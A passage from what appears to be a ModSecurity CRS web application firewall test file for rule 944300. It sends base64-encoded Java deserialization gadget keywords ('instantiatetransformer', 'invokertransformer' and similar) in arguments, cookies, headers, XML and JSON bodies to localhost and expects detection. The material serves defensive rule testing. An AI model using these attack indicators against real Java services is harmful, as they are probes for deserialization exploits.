keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-165 - desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-166 - desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-167 - desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-168 - desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-169 - desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-170 - desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-171 - desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-172 - desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-173 - desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-174 - desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-175 - desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-176 - desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-177 - desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-178 - desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-179 - desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-180 - desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/x-www-form-urlencoded" - test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-181 - desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-182 - desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-183 - desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: 
"HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-184 - desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-185 - desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-186 - desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: 
"{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-187 - desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-188 - desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-189 - desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy - method: "POST" - version: 
"HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-190 - desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-191 - desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-192 - desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" 
- output: - log_contains: "id \"944300\"" - - - - test_title: 944300-193 - desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-194 - desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-195 - desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-196 - desc: 
"Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-197 - desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-198 - desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-199 - desc: "Argument 
name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-200 - desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-201 - desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-202 - desc: "Request header test includes keyword 
aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW52b2tlcnRyYW5zZm9ybWVy - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-203 - desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-204 - desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-205 - desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 
